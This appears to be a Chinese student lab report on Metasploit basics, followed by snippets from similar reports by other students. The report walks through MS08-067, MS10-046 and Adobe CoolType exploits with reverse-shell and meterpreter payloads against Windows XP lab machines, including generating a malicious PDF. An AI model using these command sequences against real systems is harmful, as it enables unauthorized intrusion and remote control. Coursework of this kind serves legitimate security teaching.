2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

一、攻击实例

  • 主动攻击的实践

    • ms08_067(成功)
      payload/generic/shell_reverse_tcp(成功)
  • 攻击浏览器的实践
    • ms11_050(失败)
    • ms11_046(成功)
      exploit/windows/browser/ms10_046_shortcut_icon_dllloader(成功且唯一)
      exploit/windows/smb/ms10_046_shortcut_icon_dllloader(成功)
  • 攻击客户端的实践
    • Adobe(成功)
  • 成功应用任何一个辅助模块
    • 应用use auxiliary/scanner/portscan/ACK(成功且唯一)

二、知识点总结

  • 1.MSF攻击方法

    • 主动攻击:扫描主机漏洞,进行攻击
    • 攻击浏览器
    • 攻击其他客户端
  • 2.MSF的六种模块
    • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
      主动渗透攻击:攻击某个系统服务
      被动渗透攻击:攻击某个客户端应用
    • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
      网络服务的扫描与查点
      探查敏感信息泄露、Fuzz测试发掘漏洞
      收集登录密码
    • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
    • 空字段模块Nop Modules
      一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)
      由于系统无法精确计算shellcode的起始地址,所以加入nops以增加攻击成功的概率
    • 编码模块Encoders
      改变payload形状,使得不出现特定字符
      确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”
    • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行
  • 查看六种模块源码目录/usr/share/metasploit-framework/modules
  • 3.MSF的三种用户操作界面
    • msfconsole
      查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
      查看设置信息show [options]
      查看攻击目标类型show [target]
      查找命令search
      查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows
    • armitage
      启动服务器service postgresql start
      启动armitagearmitage
    • webgui

三、攻击实例

Exp5-1 实现ms08_067

靶机:windows XP SP3 中文版
payload : generic/shell_reverse_tcp

实验步骤

  • 输入msfconsole打开metasploit控制台
  • 查看一下ms08_067这个漏洞在哪里search ms08-067
  • 选择漏洞use exploit/windows/smb/ms08_067_netapi
  • 选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp对payload进行设置
  • show targets 查看这个漏洞波及的系统版本,我们也可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)
  • 查看设置信息show options
  • 设置主机ip 192.168.1.241端口号 5336
  • 设置靶机ip set RHOSTS 192.168.1.140
  • 接着使用exploit指令攻击成功

任务二:一个针对浏览器的攻击

实现ms11_050(失败)

  • 关于漏洞的原理

    • 原理:IE浏览器MSHTML模块在处理无效标签时存在use-after-free漏洞
    • 影响范围:IE Exploer 7 以及 IE Exploer 8
    search ms11_050 搜索漏洞
use windows/browser/ms10_046_shortcut_icon_dllloader    使用漏洞
show payloads   显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp 选择攻击载荷
options 查看配置信息
set LHOST [ip]  设置监听地址
set 设置监听端口
set 设置攻击Ip
exploit 开始攻击,并在靶机打开msf给的http网址
sessions -i num   查看开启的会话

    实验步骤

  • search ms11_050 搜索漏洞
  • use windows/browser/ms10_046_shortcut_icon_dllloader 使用漏洞
  • show payloads 显示可用攻击载荷
    set payload windows/meterpreter/reverse_tcp 选择攻击载荷
  • 对ip地址,端口号进行设置,然后进行攻击但失败了。

原因探索:

根据同学之间的交流,大家一致认为虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功。

实现ms10_046(成功且唯一)

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8
exploit/windows/browser/ms10_046_shortcut_icon_dllloader

实验步骤

show payloads   #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 192.168.1.241  #设置监听地址
exploit #进行攻击
  • 输入msfconsole进入控制台,并使用刚才找到的exploituse windows/browser/ms10_046_shortcut_icon_dllloader
  • 配置地址和端口号等信息
  • 用exploit 进行攻击,windows XP打开相应地址然而出现了问题,失败了,查看session并没有连接。从而进行解决问题的思考ing。。。
  • 尝试靶机用windows 7 结果一样失败了

原因探索:

探索原因后发现,windows XP靶机的IE浏览器的版本有问题,导致程序无法调用dll文件执行相应操作,实现攻击,所以得手动运行程序(有点low),才能实现攻击成功。


实现ms10_046(2)(成功)

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8
exploit/windows/smb/ms10_046_shortcut_icon_dllloader

show payloads   #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 192.168.1.241  #设置监听地址
exploit #进行攻击

实验步骤

  • 根据实现ms10_046(1)步骤可成功完成攻击。


  • 最终攻击成功

任务三:一个针对客户端的攻击

实现Adobe

  • 漏洞原理

    • 这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出
  • 本次攻击对象:windows xp sp3 Adobe 9.3.2

实验步骤

search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing  #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.241 #攻击者地址
set FILENAME 20165336.pdf #设置生成pdf文件的文件名
exploit #攻击
  • 选择攻击模块,将其载入。
  • 使用命令show payloads选择要使用的payload(这里使用了windows/meterpreter/reverse_http
  • 对地址等参数进行配置
  • 使用命令show options查看相关参数设置要求
  • 设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个20165336.pdf文件然后将该文件传送到靶机上(通过共享文件夹)并且在攻击机上打开监听
  • 将靶机中的pdf文件打开,攻击机成功获取到靶机shell:

任务四:应用辅助模块

  • 辅助模块:运用TCP中的ACK响应包检查端口的开放状态以及是否被屏蔽
  • 在auxiliary中进行查找search auxiliary
  • auxiliary中use auxiliary/scanner/portscan/ack并配置相应的主机地址和需要扫描的端口(这里我选择默认)
  • exploit开始进行攻击
  • auxiliary模块执行完毕(为了截图提前中止了)

四、实验总结

1.实验总结与体会

这次实验我更加对msf有了极大的兴趣,再用exploit和payload时,让我了解到了许多的漏洞和有效的攻击手段,从而感觉到了工具的强大,在利用好工具与自己掌握很扎实的基础知识下,攻击便会得心应手,个人感觉nmap和auxiliary的作用有相似之处。总之在经过这次实验后,我对msf的理解又更深了一步,我相信在兴趣的推动下我会不断提高。

2.离实战还缺些什么技术

对于msf我认为还是个小白,距离实战还有很远的路,在熟练基础知识的前提下,还要熟悉所使用的工具,还需要不断地提高自己对渗透攻击的理解思维,这样才能在实战中从容应对。

3.用自己的话解释什么是exploit,payload,encode

exploit我认为是攻击者开始向靶机进行攻击。

payload我认为是攻击者进行攻击所能提供用到的“武器”。

encode编码我认为是使shellcode改变,从而躲避检测。

原文地址:https://www.cnblogs.com/20165336kzq/p/10728107.html

时间: 2024-11-07 17:53:49

2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用的相关文章

20155338 《网络攻防》Exp5 MSF基础应用

20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶机中,相当于载具 payload负责执行相应的攻击代码,相当于载荷 encode是伪装,为了避免payload中坏字符影响功能,相当于编码 实验过程 Windows服务渗透攻击--MS08-067安全漏洞 攻击机:kali,ip:172.30.6.185 靶机:windows XP SP3,IP地址是172.

20155301 《网络攻防》 Exp5 MSF基础应用

20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标靶机的这种漏洞或者个人信息,并可以进行一些比如摄屏.提权等操作. payload就是一个负载,可以负载程序或者数据等到目标靶机,实现攻击. encode是一个加密的工具,可以加密信息或者文件. Windows服务渗透攻击--ms07_029_msdns_zonename 基本信息 1.靶机型号:windows

2018-2019~6 20165107 网络对抗技术 Exp5 MSF基础应用

20165107 网络对抗技术 Exp5 MSF基础应用 1.实验内容 1.1一个主动攻击实践,如ms08_067(成功) 1.2 一个针对浏览器的攻击,如ms11_050(成功) 1.3 一个针对客户端的攻击,如Adobe(成功) 1.4 成功应用任何一个辅助模块,如scanner/rdp/ms12_020_check(唯一,成功) 2.基础问题回答:用自己的话解释什么是exploit,payload,encode. exploit相当于是载具,是渗透攻击模块,将负责攻击的代码传送到靶机中.

20155334 《网络攻防》Exp5 MSF基础应用

一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成具体的任务 encode 对payload进行再编译,避免让被攻击者知道这是病毒 二.实践总结与体会 怎么说呢,这次实验是学这门课程以来遇到问题最多的一次,虽然不知道后面的实验有木有这么虐心. 苦难越多,意味着收获越多,虽然使用的都是以前的,现在看来已经过时的漏洞,但成功的喜悦还是让我幸福满满. 虽

20155211 网络攻防技术 Exp08 Web基础

20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. Web前端javascipt,理解JavaScript的基本功能,理解DOM.编写JavaScript验证用户名.密码的规则. Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表. Web后端:编写PHP网页,连接数据库,进行用户认证. 最简单的SQL注入,XSS攻击测

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

20145311王亦徐 《网络对抗技术》 MSF基础应用

20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms08_067渗透为例 针对浏览器的攻击,以漏洞10_046为例 针对客户端的攻击,对具体应用的攻击,以对Adobe阅读器的漏洞攻击为例 最后是一个auxiliary模块的例子的应用 基础问题回答 1.解释exploit,payload,encode是什么 exploit是渗透攻击模块,利用系统服务应用中的漏洞

20145321 《网络对抗技术》 MSF基础应用

20145321 <网络对抗技术> MSF基础应用 MS08_067漏洞渗透攻击 先查看kali和windows的IP地址 进入msfconsole,选择使用ms08_067的exploit,再选择具体要负载使用的payload,设置载荷,主机ip,靶机ip 输入exploit命令即可攻击客户端.获取shell.可查看靶机IP

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机:

20155330 《网络对抗》 Exp5 MSF基础应用

20155330 <网络对抗> Exp5 MSF基础应用 实践过程记录 Windows服务渗透:MS08_067漏洞攻击 攻击机:kali IP地址:192.168.124.132 靶机:windows XP SP3 简体中文 IP地址:192.168.124.135 输入命令use exploit/windows/smb/ms08_067_netapi 设置参数 set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.23